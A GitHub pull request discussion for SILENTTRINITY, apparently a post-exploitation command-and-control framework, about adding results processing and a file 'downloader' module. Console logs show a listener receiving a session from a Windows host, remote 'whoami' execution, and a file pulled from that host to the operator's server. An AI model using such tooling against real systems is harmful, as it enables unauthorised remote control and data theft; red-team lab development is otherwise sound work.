New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Feature/results processing #15

Open
wants to merge 9 commits into
base: master
from

Conversation

Projects
None yet
4 participants
@davidtavarez
Copy link
Contributor

davidtavarez commented Oct 14, 2018

I think the Module could manage the response in order to create more powerful tools. This is a Work In Progress PR until we discuss this feature.


   _____ ______    _______   __________________  _____   ______________  __
  / ___//  _/ /   / ____/ | / /_  __/_  __/ __ \/  _/ | / /  _/_  __/\ \/ /
  \__ \ / // /   / __/ /  |/ / / /   / / / /_/ // //  |/ // /  / /    \  /
 ___/ // // /___/ /___/ /|  / / /   / / / _, _// // /|  // /  / /     / /
/____/___/_____/_____/_/ |_/ /_/   /_/ /_/ |_/___/_/ |_/___/ /_/     /_/

                         Codename: Ánima
                         Version: 0.0.1dev

ST ≫ listeners                                                                                                                                                                  
ST (listeners) ≫ use http                                                                                                                                                       
ST (listeners)(http) ≫ set BindIP 10.0.0.3                                                                                                                                      
ST (listeners)(http) ≫ set Port 8090                                                                                                                                            
ST (listeners)(http) ≫ start                                                                                                                                                    
[+] Listener 'http' started successfully!
ST (listeners)(http) ≫ modules                                                                                                                                                  
ST (modules) ≫                                                                                                                                                                  
ST (modules) ≫ use shell                                                                                                                                                        
ST (modules)(shell) ≫ set Command whoami                                                                                                                                        
ST (modules)(shell) ≫ Running on https://10.0.0.3:8090 (CTRL + C to quit)                                                                                                       
[*] Re-attaching orphaned session from 10.0.0.6 ...
[+] New session b40d1046-2039-4322-91a7-8940302606e3 connected! (10.0.0.6)
ST (modules)(shell) ≫ run all                                                                                                                                                                                                                                                                                                           
[+] b40d1046-2039-4322-91a7-8940302606e3 returned job result (id: xfFnkmaH)
[*] Path: C:\WINDOWS\System32\ Command: whoami Args: 
desktop-au143ed\hacklab

@davidtavarez

This comment has been minimized.

Copy link
Contributor

davidtavarez commented Oct 14, 2018

Also added a new module called Downloader, as a proof of manipulating results.


   _____ ______    _______   __________________  _____   ______________  __
  / ___//  _/ /   / ____/ | / /_  __/_  __/ __ \/  _/ | / /  _/_  __/\ \/ /
  \__ \ / // /   / __/ /  |/ / / /   / / / /_/ // //  |/ // /  / /    \  /
 ___/ // // /___/ /___/ /|  / / /   / / / _, _// // /|  // /  / /     / /
/____/___/_____/_____/_/ |_/ /_/   /_/ /_/ |_/___/_/ |_/___/ /_/     /_/

                         Codename: Ánima
                         Version: 0.0.1dev

ST ≫ listeners                                                                                                                                                                  
ST (listeners) ≫ use http                                                                                                                                                       
ST (listeners)(http) ≫ set BindIP 10.0.0.3                                                                                                                                      
ST (listeners)(http) ≫ set Port 8090                                                                                                                                            
ST (listeners)(http) ≫ start                                                                                                                                                    
[+] Listener 'http' started successfully!
ST (listeners)(http) ≫ modules                                                                                                                                                  
ST (modules) ≫                                                                                                                                                                  
ST (modules) ≫ use downloader                                                                                                                                                   
ST (modules)(downloader) ≫ set File C:\\WINDOWS\\Temp\\uploader.txt                                                                                                             
ST (modules)(downloader) ≫ Running on https://10.0.0.3:8090 (CTRL + C to quit)                                                                                                  
[*] Re-attaching orphaned session from 10.0.0.6 ...
[+] New session ec5bfbff-d532-4111-8c0f-c50ab3458655 connected! (10.0.0.6)
ST (modules)(downloader) ≫ run ec5bfbff-d532-4111-8c0f-c50ab3458655                                                                                                             
ST (modules)(downloader) ≫                                                                                                                                                      
[+] ec5bfbff-d532-4111-8c0f-c50ab3458655 returned job result (id: qwtJPzGs)
[+] File was downloaded successfully: /Users/davidtavarez/Projects/SILENTTRINITY/Server/uploader.txt
ST (modules)(downloader) ≫           

Let's see the content...

$ cat uploader.txt
THIS IS A TEST

@davidtavarez davidtavarez changed the title WIP Feature/results processing Feature/results processing Oct 15, 2018

@Jb05s

This comment has been minimized.

Copy link

Jb05s commented Oct 22, 2018

For the download module, we can't seem to pull any files from the remote system after a certain file size is reached. Relatively small .txt files work perfectly fine.. but when a file reaches about.. say 10,000kb.. the file either doesn't get pulled (after waiting quite some time) or the file gets partially pulled, but the file content always contains 77b and looks to be encrypted? Have any of you experienced this while testing?

Example: Downloading PowerView.ps1 from remote machine. Results in file content size of 46bytes.

@davidtavarez

This comment has been minimized.

Copy link
Contributor

davidtavarez commented Oct 26, 2018

I'm trying to find a workaround @Jb05s

@byt3bl33d3r

This comment has been minimized.

Copy link
Owner

byt3bl33d3r commented Oct 26, 2018

@davidtavarez Just an update on this, implementing crypto in the comms channel required refactoring the entire way jobs and sessions are handled. Once I finish this up we can work on implementing this in the new code base

@b2az

This comment has been minimized.

Copy link

b2az commented Nov 3, 2018

@davidtavarez are there any further informations to this topic?
In some cases, it's better to process the data on the server instead of doing it on the client.
Would be interesting for me, because atm i'm working on new modules.

Best,
b2az

@davidtavarez

This comment has been minimized.

Copy link
Contributor

davidtavarez commented Nov 3, 2018

Hey @b2az what's happening is @byt3bl33d3r is refactoring the way jobs and sessions are handled (comment here). So, I'm just waiting until the refactoring is done and stable to continue working on this PR. I want to achieve a more interactive interaction between server an clients. I decided to not place more PRs until the refactoring is done, after that I will continue contributing to this repo.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment